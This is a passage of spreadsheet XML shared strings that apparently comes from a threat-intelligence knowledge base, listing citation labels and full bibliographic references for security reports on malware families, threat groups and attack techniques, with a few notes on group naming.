    <t>Umbreon Trend Micro</t>
  </si>
  <si>
    <t>Uninformed Needle</t>
  </si>
  <si>
    <t>Unit 42 BackConfig May 2020</t>
  </si>
  <si>
    <t>Unit 42 BadPatch Oct 2017</t>
  </si>
  <si>
    <t>Unit 42 Bisonal July 2018</t>
  </si>
  <si>
    <t>Unit 42 C0d0so0 Jan 2016</t>
  </si>
  <si>
    <t>Unit 42 CARROTBAT January 2020</t>
  </si>
  <si>
    <t>Unit 42 CARROTBAT November 2018</t>
  </si>
  <si>
    <t>Unit 42 Cobalt Gang Oct 2018</t>
  </si>
  <si>
    <t>Unit 42 DGA Feb 2019</t>
  </si>
  <si>
    <t>Unit 42 DarkHydrus July 2018</t>
  </si>
  <si>
    <t>Unit 42 Gamaredon February 2022</t>
  </si>
  <si>
    <t>Unit 42 Gorgon Group Aug 2018</t>
  </si>
  <si>
    <t>Unit 42 Hildegard Malware</t>
  </si>
  <si>
    <t>Unit 42 Inception November 2018</t>
  </si>
  <si>
    <t xml:space="preserve">Unit 42 IronNetInjector February 2021 </t>
  </si>
  <si>
    <t>Unit 42 Kazuar May 2017</t>
  </si>
  <si>
    <t>Unit 42 KerrDown February 2019</t>
  </si>
  <si>
    <t>Unit 42 Lucifer June 2020</t>
  </si>
  <si>
    <t>Unit 42 Mac Crypto Cookies January 2019</t>
  </si>
  <si>
    <t>Unit 42 Magic Hound Feb 2017</t>
  </si>
  <si>
    <t>Unit 42 MechaFlounder March 2019</t>
  </si>
  <si>
    <t>Unit 42 MuddyWater Nov 2017</t>
  </si>
  <si>
    <t>Unit 42 NETWIRE April 2020</t>
  </si>
  <si>
    <t>Unit 42 NOKKI Sept 2018</t>
  </si>
  <si>
    <t>Unit 42 Nokki Oct 2018</t>
  </si>
  <si>
    <t>Unit 42 OilRig Sept 2018</t>
  </si>
  <si>
    <t>Unit 42 OopsIE! Feb 2018</t>
  </si>
  <si>
    <t>Unit 42 Phishery Aug 2018</t>
  </si>
  <si>
    <t>Unit 42 PingPull Jun 2022</t>
  </si>
  <si>
    <t>Unit 42 Pirpi July 2015</t>
  </si>
  <si>
    <t>Unit 42 Playbook Dec 2017</t>
  </si>
  <si>
    <t>Unit 42 ProjectM March 2016</t>
  </si>
  <si>
    <t>Unit 42 QUADAGENT July 2018</t>
  </si>
  <si>
    <t>Unit 42 RGDoor Jan 2018</t>
  </si>
  <si>
    <t>Unit 42 Rocke January 2019</t>
  </si>
  <si>
    <t>Unit 42 SeaDuke 2015</t>
  </si>
  <si>
    <t>Unit 42 Shamoon3 2018</t>
  </si>
  <si>
    <t>Unit 42 Siloscape Jun 2021</t>
  </si>
  <si>
    <t>Unit 42 Sofacy Feb 2018</t>
  </si>
  <si>
    <t>Unit 42 Sofacy Nov 2018</t>
  </si>
  <si>
    <t>Unit 42 TA551 Jan 2021</t>
  </si>
  <si>
    <t>Unit 42 Tropic Trooper Nov 2016</t>
  </si>
  <si>
    <t>Unit 42 Unsecured Docker Daemons</t>
  </si>
  <si>
    <t>Unit 42 VERMIN Jan 2018</t>
  </si>
  <si>
    <t>Unit 42 Valak July 2020</t>
  </si>
  <si>
    <t>Unit 42 WhisperGate January 2022</t>
  </si>
  <si>
    <t>Unit42 AcidBox June 2020</t>
  </si>
  <si>
    <t>Unit42 Azorult Nov 2018</t>
  </si>
  <si>
    <t>Unit42 BabyShark Apr 2019</t>
  </si>
  <si>
    <t>Unit42 BabyShark Feb 2019</t>
  </si>
  <si>
    <t>Unit42 BendyBear Feb 2021</t>
  </si>
  <si>
    <t>Unit42 Cannon Nov 2018</t>
  </si>
  <si>
    <t>Unit42 Clop April 2021</t>
  </si>
  <si>
    <t>Unit42 CookieMiner Jan 2019</t>
  </si>
  <si>
    <t>Unit42 DNS Mar 2019</t>
  </si>
  <si>
    <t>Unit42 DarkHydrus Jan 2019</t>
  </si>
  <si>
    <t>Unit42 Emissary Panda May 2019</t>
  </si>
  <si>
    <t>Unit42 LockerGoga 2019</t>
  </si>
  <si>
    <t>Unit42 Molerat Mar 2020</t>
  </si>
  <si>
    <t>Unit42 OilRig Nov 2018</t>
  </si>
  <si>
    <t>Unit42 PlugX June 2017</t>
  </si>
  <si>
    <t>Unit42 RDAT July 2020</t>
  </si>
  <si>
    <t>Unit42 Redaman January 2019</t>
  </si>
  <si>
    <t>Unit42 SUPERNOVA Dec 2020</t>
  </si>
  <si>
    <t>Unit42 SilverTerrier 2016</t>
  </si>
  <si>
    <t>Unit42 SilverTerrier 2018</t>
  </si>
  <si>
    <t>Unit42 Sofacy Dec 2018</t>
  </si>
  <si>
    <t>Unit42 Xbash Sept 2018</t>
  </si>
  <si>
    <t>University of Birmingham C2</t>
  </si>
  <si>
    <t>Uptycs Confucius APT Jan 2021</t>
  </si>
  <si>
    <t>Uptycs Warzone UAC Bypass November 2020</t>
  </si>
  <si>
    <t>User Approved Kernel Extension Pike’s</t>
  </si>
  <si>
    <t>VB .NET Mar 2020</t>
  </si>
  <si>
    <t>VB Microsoft</t>
  </si>
  <si>
    <t>VDSO Aug 2005</t>
  </si>
  <si>
    <t>VMRay OSAMiner dynamic analysis 2021</t>
  </si>
  <si>
    <t>VNC Authentication</t>
  </si>
  <si>
    <t>VNC Vulnerabilities</t>
  </si>
  <si>
    <t>Varonis Power Automate Data Exfiltration</t>
  </si>
  <si>
    <t>VectorSec ForFiles Aug 2017</t>
  </si>
  <si>
    <t>Venafi SSH Key Abuse</t>
  </si>
  <si>
    <t>Villeneuve 2011</t>
  </si>
  <si>
    <t>Villeneuve 2014</t>
  </si>
  <si>
    <t>Villeneuve et al 2014</t>
  </si>
  <si>
    <t>VirusBulletin Kimsuky October 2019</t>
  </si>
  <si>
    <t>VirusTotal FAQ</t>
  </si>
  <si>
    <t>Visa FIN6 Feb 2019</t>
  </si>
  <si>
    <t>Visa RawPOS March 2015</t>
  </si>
  <si>
    <t>Volatility Detecting Hooks Sept 2012</t>
  </si>
  <si>
    <t>Volatility Phalanx2</t>
  </si>
  <si>
    <t>Volexity Exchange Marauder March 2021</t>
  </si>
  <si>
    <t>Volexity InkySquid BLUELIGHT August 2021</t>
  </si>
  <si>
    <t>Volexity InkySquid RokRAT August 2021</t>
  </si>
  <si>
    <t>Volexity Ocean Lotus November 2020</t>
  </si>
  <si>
    <t>Volexity OceanLotus Nov 2017</t>
  </si>
  <si>
    <t>Volexity Patchwork June 2018</t>
  </si>
  <si>
    <t>Volexity PowerDuke November 2016</t>
  </si>
  <si>
    <t>Volexity SolarWinds</t>
  </si>
  <si>
    <t>Volexity Virtual Private Keylogging</t>
  </si>
  <si>
    <t>Vulnerability and Exploit Detector</t>
  </si>
  <si>
    <t>Wald0 Guide to GPOs</t>
  </si>
  <si>
    <t>Walmart Roberts Oct 2018</t>
  </si>
  <si>
    <t>Wardle Dylib Hijack Vulnerable Apps</t>
  </si>
  <si>
    <t>Wardle Dylib Hijacking OSX 2015</t>
  </si>
  <si>
    <t>Wardle Persistence Chapter</t>
  </si>
  <si>
    <t>Washington Post WannaCry 2017</t>
  </si>
  <si>
    <t>Waterbug</t>
  </si>
  <si>
    <t>WeLiveSecurity Gapz and Redyms Mar 2013</t>
  </si>
  <si>
    <t>Wevtutil Microsoft Documentation</t>
  </si>
  <si>
    <t>White House Imposing Costs RU Gov April 2021</t>
  </si>
  <si>
    <t>Wikibooks Grsecurity</t>
  </si>
  <si>
    <t>Wikipedia 802.1x</t>
  </si>
  <si>
    <t>Wikipedia Active Directory</t>
  </si>
  <si>
    <t>Wikipedia BIOS</t>
  </si>
  <si>
    <t>Wikipedia Binary-to-text Encoding</t>
  </si>
  <si>
    <t>Wikipedia Booting</t>
  </si>
  <si>
    <t>Wikipedia Browser Extension</t>
  </si>
  <si>
    <t>Wikipedia Character Encoding</t>
  </si>
  <si>
    <t>Wikipedia Code Signing</t>
  </si>
  <si>
    <t>Wikipedia Control Flow Integrity</t>
  </si>
  <si>
    <t>Wikipedia Duqu</t>
  </si>
  <si>
    <t>Wikipedia File Header Signatures</t>
  </si>
  <si>
    <t>Wikipedia HPKP</t>
  </si>
  <si>
    <t>Wikipedia HTML Application</t>
  </si>
  <si>
    <t>Wikipedia Ifconfig</t>
  </si>
  <si>
    <t>Wikipedia LLMNR</t>
  </si>
  <si>
    <t>Wikipedia Loadable Kernel Module</t>
  </si>
  <si>
    <t>Wikipedia Man in the Browser</t>
  </si>
  <si>
    <t>Wikipedia OSI</t>
  </si>
  <si>
    <t>Wikipedia Password cracking</t>
  </si>
  <si>
    <t>Wikipedia Public Key Crypto</t>
  </si>
  <si>
    <t>Wikipedia Root Certificate</t>
  </si>
  <si>
    <t>Wikipedia Rootkit</t>
  </si>
  <si>
    <t>Wikipedia Screensaver</t>
  </si>
  <si>
    <t>Wikipedia Server Message Block</t>
  </si>
  <si>
    <t>Wikipedia Shared Resource</t>
  </si>
  <si>
    <t>Wikipedia UEFI</t>
  </si>
  <si>
    <t>Wikipedia VBA</t>
  </si>
  <si>
    <t>Wikipedia Windows Library Files</t>
  </si>
  <si>
    <t>Wikipedia Windows Registry</t>
  </si>
  <si>
    <t>Wikipedia pwdump</t>
  </si>
  <si>
    <t>WinOSBite verclsid.exe</t>
  </si>
  <si>
    <t>WinRAR Homepage</t>
  </si>
  <si>
    <t>WinZip Homepage</t>
  </si>
  <si>
    <t>Windows Anonymous Enumeration of SAM Accounts</t>
  </si>
  <si>
    <t>Windows AppleJeus GReAT</t>
  </si>
  <si>
    <t>Windows Blogs Microsoft Edge Sandbox</t>
  </si>
  <si>
    <t>Windows Commands JPCERT</t>
  </si>
  <si>
    <t>Windows Event Forwarding Payne</t>
  </si>
  <si>
    <t>Windows Getting Started Drivers</t>
  </si>
  <si>
    <t>Windows Log Events</t>
  </si>
  <si>
    <t>Windows Malware Infecting Android</t>
  </si>
  <si>
    <t>Windows NT Command Shell</t>
  </si>
  <si>
    <t>Windows OS Hub RDP</t>
  </si>
  <si>
    <t>Windows Privilege Escalation Guide</t>
  </si>
  <si>
    <t>Windows Process Injection KernelCallbackTable</t>
  </si>
  <si>
    <t>Windows RDP Sessions</t>
  </si>
  <si>
    <t>Windows Server Containers Are Open</t>
  </si>
  <si>
    <t>Windows Unquoted Services</t>
  </si>
  <si>
    <t>WindowsIR Anti-Forensic Techniques</t>
  </si>
  <si>
    <t>Wine API samlib.dll</t>
  </si>
  <si>
    <t>Winexe Github Sept 2013</t>
  </si>
  <si>
    <t>WireLurker</t>
  </si>
  <si>
    <t>Wired Lockergoga 2019</t>
  </si>
  <si>
    <t>Wired Magecart S3 Buckets, 2019</t>
  </si>
  <si>
    <t>Wired SandCat Oct 2019</t>
  </si>
  <si>
    <t>Wired Uber Breach</t>
  </si>
  <si>
    <t>Wits End and Shady PowerShell Profiles</t>
  </si>
  <si>
    <t>Writing Bad Malware for OSX</t>
  </si>
  <si>
    <t>XAgentOSX 2017</t>
  </si>
  <si>
    <t>XPNSec PPID Nov 2017</t>
  </si>
  <si>
    <t>XSL Bypass Mar 2019</t>
  </si>
  <si>
    <t>Xorrior Authorization Plugins</t>
  </si>
  <si>
    <t>Xpn Argue Like Cobalt 2019</t>
  </si>
  <si>
    <t>ZDNET Selling Data</t>
  </si>
  <si>
    <t>ZDNet Dtrack</t>
  </si>
  <si>
    <t>ZScaler Hacking Team</t>
  </si>
  <si>
    <t>ZScaler SEO</t>
  </si>
  <si>
    <t>ZScaler Squirrelwaffle Sep 2021</t>
  </si>
  <si>
    <t>Zairon Hooking Dec 2006</t>
  </si>
  <si>
    <t>Zdnet Kimsuky Dec 2018</t>
  </si>
  <si>
    <t>Zdnet Kimsuky Group September 2020</t>
  </si>
  <si>
    <t>Zdnet Ngrok September 2018</t>
  </si>
  <si>
    <t>Zlib Github</t>
  </si>
  <si>
    <t>Zscaler APT31 Covid-19 October 2020</t>
  </si>
  <si>
    <t>Zscaler Bazar September 2020</t>
  </si>
  <si>
    <t>Zscaler Cobian Aug 2017</t>
  </si>
  <si>
    <t>Zscaler Higaisa 2020</t>
  </si>
  <si>
    <t>Zscaler Kasidet</t>
  </si>
  <si>
    <t>Zscaler Lyceum DnsSystem June 2022</t>
  </si>
  <si>
    <t>abusing_com_reg</t>
  </si>
  <si>
    <t>acroread package compromised Arch Linux Mail 8JUL2018</t>
  </si>
  <si>
    <t>acunetix Server Secuirty</t>
  </si>
  <si>
    <t>ad_blocker_with_miner</t>
  </si>
  <si>
    <t>alert_TA18_106A</t>
  </si>
  <si>
    <t>alientvault macspy</t>
  </si>
  <si>
    <t>amnesia malware</t>
  </si>
  <si>
    <t>anomali-linux-rabbit</t>
  </si>
  <si>
    <t>anomali-rocke-tactics</t>
  </si>
  <si>
    <t>apple doco bonjour description</t>
  </si>
  <si>
    <t>applescript signing</t>
  </si>
  <si>
    <t>aptsim</t>
  </si>
  <si>
    <t>archlinux Systemd Timers Aug 2020</t>
  </si>
  <si>
    <t>att_def_ps_logging</t>
  </si>
  <si>
    <t>auditpol</t>
  </si>
  <si>
    <t>auditpol.exe_STRONTIC</t>
  </si>
  <si>
    <t>avoslocker_ransomware</t>
  </si>
  <si>
    <t>az monitor diagnostic-settings</t>
  </si>
  <si>
    <t>bad_luck_blackcat</t>
  </si>
  <si>
    <t>bencane blog bashrc</t>
  </si>
  <si>
    <t>blackmatter_blackcat</t>
  </si>
  <si>
    <t>bypass_webproxy_filtering</t>
  </si>
  <si>
    <t>byt3bl33d3r NTLM Relaying</t>
  </si>
  <si>
    <t>chasing_avaddon_ransomware</t>
  </si>
  <si>
    <t>cisa_malware_orgs_ukraine</t>
  </si>
  <si>
    <t>cobaltstrike manual</t>
  </si>
  <si>
    <t>code_persistence_zsh</t>
  </si>
  <si>
    <t>create_sym_links</t>
  </si>
  <si>
    <t>creatingXPCservices</t>
  </si>
  <si>
    <t>crowdstrike bpf socket filters</t>
  </si>
  <si>
    <t>cybereason osx proton</t>
  </si>
  <si>
    <t>def_ev_win_event_logging</t>
  </si>
  <si>
    <t>demystifying_ryuk</t>
  </si>
  <si>
    <t>dharma_ransomware</t>
  </si>
  <si>
    <t>dhcp_serv_op_events</t>
  </si>
  <si>
    <t>dhs_threat_to_net_devices</t>
  </si>
  <si>
    <t>diantz.exe_lolbas</t>
  </si>
  <si>
    <t>dns_changer_trojans</t>
  </si>
  <si>
    <t>doppelpaymer_crowdstrike</t>
  </si>
  <si>
    <t>dump_pwd_dcsync</t>
  </si>
  <si>
    <t>eSentire FIN7 July 2021</t>
  </si>
  <si>
    <t>engima0x3 DNX Bypass</t>
  </si>
  <si>
    <t>engima0x3 RCSI Bypass</t>
  </si>
  <si>
    <t>enigma0x3 Fileless UAC Bypass</t>
  </si>
  <si>
    <t>enigma0x3 normal.dotm</t>
  </si>
  <si>
    <t>enigma0x3 sdclt app paths</t>
  </si>
  <si>
    <t>enigma0x3 sdclt bypass</t>
  </si>
  <si>
    <t>eset_osx_flashback</t>
  </si>
  <si>
    <t>evolution of pirpi</t>
  </si>
  <si>
    <t>evt_log_tampering</t>
  </si>
  <si>
    <t>exatrack bpf filters passive backdoors</t>
  </si>
  <si>
    <t>f-secure janicab</t>
  </si>
  <si>
    <t>falconoverwatch_blackcat_attack</t>
  </si>
  <si>
    <t>fileinfo plist file description</t>
  </si>
  <si>
    <t>fsecure NanHaiShu July 2016</t>
  </si>
  <si>
    <t>fsutil_behavior</t>
  </si>
  <si>
    <t>gist Arch package compromise 10JUL2018</t>
  </si>
  <si>
    <t>haking9 libpcap network sniffing</t>
  </si>
  <si>
    <t>hasherezade Process Doppelgänging Dec 2017</t>
  </si>
  <si>
    <t>hasherezade debug</t>
  </si>
  <si>
    <t>hexed osx.dok analysis 2019</t>
  </si>
  <si>
    <t>how_pwd_rev_enc_1</t>
  </si>
  <si>
    <t>how_pwd_rev_enc_2</t>
  </si>
  <si>
    <t>httrack_unhcr</t>
  </si>
  <si>
    <t>iDefense Rootkit Overview</t>
  </si>
  <si>
    <t>iPhone Charging Cable Hack</t>
  </si>
  <si>
    <t>iSIGHT Sandworm 2014</t>
  </si>
  <si>
    <t>iSight Sandworm Oct 2014</t>
  </si>
  <si>
    <t>insecure_reg_perms</t>
  </si>
  <si>
    <t>intezer stripped binaries elf files 2018</t>
  </si>
  <si>
    <t>intezer-kaiji-malware</t>
  </si>
  <si>
    <t>inv_ps_attacks</t>
  </si>
  <si>
    <t>ired Dumping LSA Secrets</t>
  </si>
  <si>
    <t>ired mscache</t>
  </si>
  <si>
    <t>ise Password Manager February 2019</t>
  </si>
  <si>
    <t>jRAT Symantec Aug 2018</t>
  </si>
  <si>
    <t>launchd Keywords for plists</t>
  </si>
  <si>
    <t>lazgroup_idn_phishing</t>
  </si>
  <si>
    <t>libzip</t>
  </si>
  <si>
    <t>macOS APT Activity Bradley</t>
  </si>
  <si>
    <t>macOS Foundation</t>
  </si>
  <si>
    <t>macOS Hierarchical File System Overview</t>
  </si>
  <si>
    <t>macOS MS office sandbox escape</t>
  </si>
  <si>
    <t>macOS kerberos framework MIT</t>
  </si>
  <si>
    <t>macOS root VNC login without authentication</t>
  </si>
  <si>
    <t>magnusviri emond Apr 2016</t>
  </si>
  <si>
    <t>mailx man page</t>
  </si>
  <si>
    <t>malware_hides_service</t>
  </si>
  <si>
    <t>malwarebyteslabs xcsset dubrobber</t>
  </si>
  <si>
    <t>mbed-crypto</t>
  </si>
  <si>
    <t>microsoft_services_registry_tree</t>
  </si>
  <si>
    <t>mitm_tls_downgrade_att</t>
  </si>
  <si>
    <t>mmc_vulns</t>
  </si>
  <si>
    <t>mozilla_sec_adv_2012</t>
  </si>
  <si>
    <t>nccgroup Smuggling HTA 2017</t>
  </si>
  <si>
    <t>new_rogue_DHCP_serv_malware</t>
  </si>
  <si>
    <t>new_rust_based_ransomware</t>
  </si>
  <si>
    <t>nixCraft - John the Ripper</t>
  </si>
  <si>
    <t>ntlm_relaying_kerberos_del</t>
  </si>
  <si>
    <t>objective-see 2017 review</t>
  </si>
  <si>
    <t>objective-see ay mami 2018</t>
  </si>
  <si>
    <t>objective-see windtail1 dec 2018</t>
  </si>
  <si>
    <t>objective-see windtail2 jan 2019</t>
  </si>
  <si>
    <t>objectivesee osx.shlayer apple approved 2020</t>
  </si>
  <si>
    <t>objsee block blocking login items</t>
  </si>
  <si>
    <t>objsee mac malware 2017</t>
  </si>
  <si>
    <t>objsee netwire backdoor 2019</t>
  </si>
  <si>
    <t>okta</t>
  </si>
  <si>
    <t>oletools toolkit</t>
  </si>
  <si>
    <t>paloalto Tropic Trooper 2016</t>
  </si>
  <si>
    <t>passcape Windows Vault</t>
  </si>
  <si>
    <t>pcodedmp Bontchev</t>
  </si>
  <si>
    <t>phobos_virustotal</t>
  </si>
  <si>
    <t>piazza launch agent mitigation</t>
  </si>
  <si>
    <t>pubprn</t>
  </si>
  <si>
    <t>reed thiefquest ransomware analysis</t>
  </si>
  <si>
    <t>rfc2131</t>
  </si>
  <si>
    <t>rfc3315</t>
  </si>
  <si>
    <t>rowland linux at 2019</t>
  </si>
  <si>
    <t>rundll32.exe defense evasion</t>
  </si>
  <si>
    <t>ryhanson phishery SEPT 2016</t>
  </si>
  <si>
    <t>sentinellabs resource named fork 2020</t>
  </si>
  <si>
    <t>sentinelone apt32 macOS backdoor 2020</t>
  </si>
  <si>
    <t>sentinelone macos persist Jun 2019</t>
  </si>
  <si>
    <t>sentinelone shlayer to zshlayer</t>
  </si>
  <si>
    <t>setuid man page</t>
  </si>
  <si>
    <t>solution_monitor_dhcp_scopes</t>
  </si>
  <si>
    <t>split man page</t>
  </si>
  <si>
    <t>sqlmap Introduction</t>
  </si>
  <si>
    <t>store_pwd_rev_enc</t>
  </si>
  <si>
    <t>subTee .NET Profilers May 2017</t>
  </si>
  <si>
    <t>sudo man page 2018</t>
  </si>
  <si>
    <t>synack 2016 review</t>
  </si>
  <si>
    <t>t1105_lolbas</t>
  </si>
  <si>
    <t>tau bundlore erika noerenberg 2020</t>
  </si>
  <si>
    <t>taxonomy_downgrade_att_tls</t>
  </si>
  <si>
    <t>theevilbit gatekeeper bypass 2021</t>
  </si>
  <si>
    <t>tlseminar_downgrade_att</t>
  </si>
  <si>
    <t>trendmicro xcsset xcode project 2020</t>
  </si>
  <si>
    <t>troj_zegost</t>
  </si>
  <si>
    <t>tt_httrack_fake_domains</t>
  </si>
  <si>
    <t>tt_obliqueRAT</t>
  </si>
  <si>
    <t>ttint_rat</t>
  </si>
  <si>
    <t>versprite xpc vpn</t>
  </si>
  <si>
    <t>volexity_0day_sophos_FW</t>
  </si>
  <si>
    <t>vxunderground debug</t>
  </si>
  <si>
    <t>w32.tidserv.g</t>
  </si>
  <si>
    <t>wardle artofmalware volume1</t>
  </si>
  <si>
    <t>wardle chp2 persistence</t>
  </si>
  <si>
    <t>wardle evilquest parti</t>
  </si>
  <si>
    <t>wardle evilquest partii</t>
  </si>
  <si>
    <t>what_is_mmc</t>
  </si>
  <si>
    <t>win10_asr</t>
  </si>
  <si>
    <t>win_clsid_key</t>
  </si>
  <si>
    <t>win_mmc</t>
  </si>
  <si>
    <t>win_msc_files_overview</t>
  </si>
  <si>
    <t>win_wbadmin_delete_catalog</t>
  </si>
  <si>
    <t>win_xml_evt_log</t>
  </si>
  <si>
    <t>xorrior chrome extensions macOS</t>
  </si>
  <si>
    <t>xorrior emond Jan 2018</t>
  </si>
  <si>
    <t>Überwachung APT28 Forfiles June 2015</t>
  </si>
  <si>
    <t>0x00pico. (2017, September 25). Super-Stealthy Droppers. Retrieved October 4, 2021.</t>
  </si>
  <si>
    <t>Phil Stokes. (2021, February 16). 20 Common Tools &amp; Techniques Used by macOS Threat Actors &amp; Malware. Retrieved August 23, 2021.</t>
  </si>
  <si>
    <t>kate. (2020, September 25). APT-C-43 steals Venezuelan military secrets to provide intelligence support for the reactionaries — HpReact campaign. Retrieved November 20, 2020.</t>
  </si>
  <si>
    <t>Hegel, T. (2018, May 3). Burning Umbrella: An Intelligence Report on the Winnti Umbrella and Associated State-Sponsored Attackers. Retrieved July 8, 2018.</t>
  </si>
  <si>
    <t>I. Pavlov. (2019). 7-Zip. Retrieved February 20, 2020.</t>
  </si>
  <si>
    <t>Dr. Nestori Syynimaa. (2018, October 25). AADInternals. Retrieved February 1, 2022.</t>
  </si>
  <si>
    <t>Dr. Nestori Syynimaa. (2021, January 31). BPRT unleashed: Joining multiple devices to Azure AD and Intune. Retrieved March 4, 2022.</t>
  </si>
  <si>
    <t>Dr. Nestori Syynimaa. (2020, September 6). Bypassing conditional access by faking device compliance. Retrieved March 4, 2022.</t>
  </si>
  <si>
    <t>Dr. Nestori Syynimaa. (2021, March 3). Deep-dive to Azure AD device join. Retrieved March 9, 2022.</t>
  </si>
  <si>
    <t>Dr. Nestori Syynimaa. (2020, July 13). Unnoticed sidekick: Getting access to cloud as an on-prem admin. Retrieved September 28, 2022.</t>
  </si>
  <si>
    <t>Dr. Nestori Syynimaa. (2018, October 25). AADInternals. Retrieved February 18, 2022.</t>
  </si>
  <si>
    <t>Dr. Nestori Syynimaa. (2021, December 13). AADInternals. Retrieved February 1, 2022.</t>
  </si>
  <si>
    <t>Dr. Nestori Syynimaa. (2017, November 16). Security vulnerability in Azure AD &amp; Office 365 identity federation. Retrieved September 28, 2022.</t>
  </si>
  <si>
    <t>Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.</t>
  </si>
  <si>
    <t>Lucand,G. (2018, February 18). Detect DCShadow, impossible?. Retrieved March 30, 2018.</t>
  </si>
  <si>
    <t>Metcalf, S. (2014, November 22). Mimikatz and Active Directory Kerberos Attacks. Retrieved June 2, 2016.</t>
  </si>
  <si>
    <t>Metcalf, S. (2015, May 03). Detecting Forged Kerberos Ticket (Golden Ticket &amp; Silver Ticket) Use in Active Directory. Retrieved December 23, 2015.</t>
  </si>
  <si>
    <t>Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL &amp; Exploiting Group Policy Preferences. Retrieved February 17, 2020.</t>
  </si>
  <si>
    <t>Metcalf, S. (2016, March 14). Sneaky Active Directory Persistence #17: Group Policy. Retrieved March 5, 2019.</t>
  </si>
  <si>
    <t>Sean Metcalf. (2014, September 12). Kerberos, Active Directory’s Secret Decoder Ring. Retrieved February 27, 2020.</t>
  </si>
  <si>
    <t>Sean Metcalf. (2014, November 10). Kerberos &amp; KRBTGT: Active Directory’s Domain Kerberos Service Account. Retrieved January 30, 2020.</t>
  </si>
  <si>
    <t>Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation, and Detection. Retrieved August 7, 2017.</t>
  </si>
  <si>
    <t>Sean Metcalf. (2015, November 17). How Attackers Use Kerberos Silver Tickets to Exploit Systems. Retrieved February 27, 2020.</t>
  </si>
  <si>
    <t>Metcalf, S. (2016, October 21). Securing Windows Workstations: Developing a Secure Baseline. Retrieved November 17, 2017.</t>
  </si>
  <si>
    <t>AMD. (1995, November 1). Magic Packet Technical White Paper. Retrieved February 17, 2021.</t>
  </si>
  <si>
    <t>ANSSI. (2021, December 6). PHISHING CAMPAIGNS BY THE NOBELIUM INTRUSION SET. Retrieved April 13, 2022.</t>
  </si>
  <si>
    <t>ANSSI. (2021, February 25). RYUK RANSOMWARE. Retrieved March 29, 2021.</t>
  </si>
  <si>
    <t>ANSSI. (2021, January 27). SANDWORM INTRUSION SET CAMPAIGN TARGETING CENTREON SYSTEMS. Retrieved March 30, 2021.</t>
  </si>
  <si>
    <t>Rosenberg, J. (2018, June 14). MirageFox: APT15 Resurfaces With New Tools Based On Old Ones. Retrieved September 21, 2018.</t>
  </si>
  <si>
    <t>Korban, C, et al. (2017, September). APT3 Adversary Emulation Plan. Retrieved January 16, 2018.</t>
  </si>
  <si>
    <t>This group was previously tracked under two distinct groups, APT34 and OilRig, but was combined due to additional reporting giving higher confidence about the overlap of the activity. (Citation: Unit 42 QUADAGENT July 2018) (Citation: FireEye APT34 Dec 2017)(Citation: Check Point APT34 April 2021)</t>
  </si>
  <si>
    <t>FireEye reporting on TEMP.Periscope (which was combined into APT40) indicated TEMP.Periscope was reported upon as Leviathan.(Citation: CISA AA21-200A APT40 July 2021)(Citation: Proofpoint Leviathan Oct 2017)(Citation: FireEye Periscope March 2018)(Citation: FireEye APT40 March 2019)</t>
  </si>
  <si>
    <t>Sean Gallagher. (2017, April 21). Researchers claim China trying to hack South Korea missile defense efforts. Retrieved October 17, 2021.</t>
  </si>
  <si>
    <t>ASEC. (2017). ASEC REPORT VOL.88. Retrieved April 16, 2019.</t>
  </si>
  <si>
    <t>Schwarz, D., Sopko J. (2018, March 08). Donot Team Leverages New Modular Malware Framework in South Asia. Retrieved June 11, 2018.</t>
  </si>
  <si>
    <t>ASERT Team. (2018, April 04). Innaput Actors Utilize Remote Access Trojan Since 2016, Presumably Targeting Victim Files. Retrieved July 9, 2018.</t>
  </si>
  <si>
    <t>ASERT. (2015, August). ASERT Threat Intelligence Report – Uncovering the Seven Pointed Dagger. Retrieved March 19, 2018.</t>
  </si>
  <si>
    <t>Fernando Martinez. (2021, July 6). Lazarus campaign TTPs and evolution. Retrieved September 22, 2021.</t>
  </si>
  <si>
    <t>Morrow, D. (2021, April 15). The rise of QakBot. Retrieved September 27, 2021.</t>
  </si>
  <si>
    <t>Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework Used with Watering Hole Attacks. Retrieved October 19, 2020.</t>
  </si>
  <si>
    <t>Hegel, T. (2021, January 13). A Global Perspective of the SideWinder APT. Retrieved January 27, 2021.</t>
  </si>
  <si>
    <t>AT&amp;T Alien Labs. (2021, September 8). TeamTNT with new campaign aka Chimaera. Retrieved September 22, 2021.</t>
  </si>
  <si>
    <t>Moncur, Rob. (2020, July 5). New Information in the AWS IAM Console Helps You Follow IAM Best Practices. Retrieved August 4, 2020.</t>
  </si>
  <si>
    <t>Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail. Retrieved April 27, 2020.</t>
  </si>
  <si>
    <t>Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances. Retrieved June 17, 2020.</t>
  </si>
  <si>
    <t>Amazon. (n.d.). AWS Console Sign-in Events. Retrieved October 23, 2019.</t>
  </si>
  <si>
    <t>AWS. (n.d.). Creating an IAM User in Your AWS Account. Retrieved January 29, 2020.</t>
  </si>
  <si>
    <t>Amazon Web Services. (n.d.). Retrieved May 28, 2021.</t>
  </si>
  <si>
    <t>Amazon Web Services. (n.d.). Share an Amazon EBS snapshot. Retrieved March 2, 2022.</t>
  </si>
  <si>
    <t>Amazon Web Services. (n.d.). AWS API GetAccountPasswordPolicy. Retrieved June 8, 2021.</t>
  </si>
  <si>
    <t>Amazon Web Services. (n.d.). AWS HeadBucket. Retrieved February 14, 2022.</t>
  </si>
  <si>
    <t>AWS. (n.d.). Policies and permissions in IAM. Retrieved April 1, 2022.</t>
  </si>
  <si>
    <t>Amazon. (n.d.). Identity Federation in AWS. Retrieved March 13, 2020.</t>
  </si>
  <si>
    <t>Amazon. (n.d.). Instance identity documents. Retrieved April 2, 2021.</t>
  </si>
  <si>
    <t>AWS. (n.d.). Instance Metadata and User Data. Retrieved July 18, 2019.</t>
  </si>
  <si>
    <t>Adam Chester. (2020, February 25). AWS Lambda Redirector. Retrieved July 8, 2022.</t>
  </si>
  <si>
    <t>Amazon. (n.d.). List Roles. Retrieved August 11, 2020.</t>
  </si>
  <si>
    <t>Amazon. (n.d.). List Users. Retrieved August 11, 2020.</t>
  </si>
  <si>
    <t>AWS. (n.d.). Logging IAM and AWS STS API calls with AWS CloudTrail. Retrieved April 1, 2022.</t>
  </si>
  <si>
    <t>Amazon. (n.d.). AWS Account Root User. Retrieved April 5, 2021.</t>
  </si>
  <si>
